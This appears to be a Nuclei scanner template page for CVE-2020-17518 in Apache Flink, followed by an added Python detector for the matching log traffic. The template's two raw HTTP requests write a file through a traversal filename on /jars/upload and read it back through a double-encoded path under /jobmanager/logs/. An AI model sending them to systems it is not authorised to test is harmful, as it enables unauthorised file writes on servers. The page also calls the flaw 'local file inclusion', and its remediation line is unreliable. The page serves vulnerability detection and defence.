Apache Flink 1.5.1 - Local File Inclusion
ID: CVE-2020-17518
Severity: high
Author: pdteam
Tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive
Description
Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.
YAML Source
id: CVE-2020-17518

info:
  name: Apache Flink 1.5.1 - Local File Inclusion
  author: pdteam
  severity: high
  description: |
    Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later).
  reference:
    - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E
    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17518
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-17518
    cwe-id: CWE-22,CWE-23
    epss-score: 0.86056
    epss-percentile: 0.98301
    cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: flink
  tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive

http:
  - raw:
      - |
        POST /jars/upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y

        ------WebKitFormBoundaryoZ8meKnrrso89R6Y
        Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"

        {{randstr}}
        ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
      - |
        GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "{{randstr}}") && status_code == 200'
# digest: 4a0a00473045022008aecb2774ca5fee0603df60ad4e8a7d9255ac2d26998f9c73127621ae30da0a022100d33cadc2727152ab1cbc660b2e9fb155d5fd2aa10f4b001ee1252be48211d99d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability in a target web application. Run it with the Nuclei tool against the target URL:
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17518.yaml"
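For the defending side, the two requests in this template leave a recognisable trace in web-server or proxy logs: a multipart filename carrying path separators on /jars/upload, followed by a double-percent-encoded traversal under /jobmanager/logs/. The following is an added example, not part of the template or of the Nuclei or Flink projects; the function names and the sample requests are constructed for illustration, and only the two endpoint paths come from the template.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Endpoints taken from the template; everything else here is constructed.
UPLOAD_PATH = "/jars/upload"
LOGS_PREFIX = "/jobmanager/logs/"

def fully_decode(path, max_rounds=3):
    """Percent-decode until stable: "..%252f" needs two rounds to become "../"."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_logs_dir(request_path):
    """True when a /jobmanager/logs/ request resolves outside that prefix once decoded."""
    if not request_path.startswith(LOGS_PREFIX):
        return False
    return not normpath(fully_decode(request_path)).startswith(LOGS_PREFIX)

def traversal_in_upload_filename(multipart_body):
    """True when any multipart part's filename carries a path separator or a '..' segment."""
    for name in re.findall(r'filename="([^"]*)"', multipart_body):
        segments = re.split(r"[\\/]", name)
        if len(segments) > 1 or ".." in segments:
            return True
    return False

def classify_request(method, path, body=""):
    """Label one request as matching either half of the template's probe, or return None."""
    if method == "POST" and path == UPLOAD_PATH and traversal_in_upload_filename(body):
        return "CVE-2020-17518: traversal in jar upload filename"
    if method == "GET" and escapes_logs_dir(path):
        return "CVE-2020-17518: encoded traversal in jobmanager log path"
    return None

# Constructed sample traffic: a benign upload and log read, then the template's two steps.
SAMPLE_REQUESTS = [
    ("POST", "/jars/upload", 'Content-Disposition: form-data; name="jarfile"; filename="WordCount.jar"'),
    ("GET", "/jobmanager/logs/jobmanager.log", ""),
    ("POST", "/jars/upload", 'Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"'),
    ("GET", "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252ftmp%252fpoc", ""),
]

def scan(requests=SAMPLE_REQUESTS):
    """Return (path, finding) pairs for every request that matches either check."""
    return [(p, lbl) for m, p, b in requests if (lbl := classify_request(m, p, b))]
```

Decoding is repeated until the path stops changing because a single decode of `..%252f` only yields `..%2f`, which a naive `..` or `../` match on the raw request line would miss.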